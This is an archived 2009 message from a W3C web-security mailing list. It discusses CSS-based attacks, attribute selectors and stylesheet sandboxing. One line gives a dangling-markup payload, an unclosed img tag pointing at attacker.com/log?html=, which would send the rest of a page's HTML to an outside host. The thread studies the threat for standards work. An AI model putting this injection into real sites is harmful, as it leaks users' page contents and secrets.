- From: <sird@rckc.at>
- Date: Tue, 8 Dec 2009 17:47:42 +0800
- To: Daniel Glazman <daniel@glazman.org>
- Cc: Adam Barth <w3c@adambarth.com>, Thomas Roessler <tlr@w3.org>, public-web-security@w3.org
Received on Tuesday, 8 December 2009 09:48:45 UTC
@daniel, we are asuming the attacker can't inject JS.. so has no access to the DOM. On some browsers anyway, he could do <img src=' http://www.attacker.com/log?html= without closing the tag and fetch everything.. but maybe that's a new attack and need a different thread as well.. hahaha Greetings!! -- Eduardo http://www.sirdarckcat.net/ Sent from Hangzhou, 33, China On Tue, Dec 8, 2009 at 5:42 PM, Daniel Glazman <daniel@glazman.org> wrote: > Adam Barth wrote: > > 3. kill attribute selectors; will never happen, period. >>> >> >> Can you elaborate on this point? Why is this off the table? >> > > Because millions of people use it? Because millions of web sites > use it? Because the feature is absolutely needed by them and it's > not the right thing to do? > > > I don't understand why that would help. Wouldn't the attacker simply >> load their stylesheet in a non-sandboxed mode? >> > > If the attacker has the ability to load in non-sandboxed mode, he/she > has the ability to (a) create a <link> or <style> element and then CSS > is the least problem since the attacker has access to the whole DOM > (b) be a man-in-between and replace a linked stylesheet by his/her own; > again, if he/she can do that, targetting JS is a much better option. > > </Daniel> > >
Received on Tuesday, 8 December 2009 09:48:45 UTC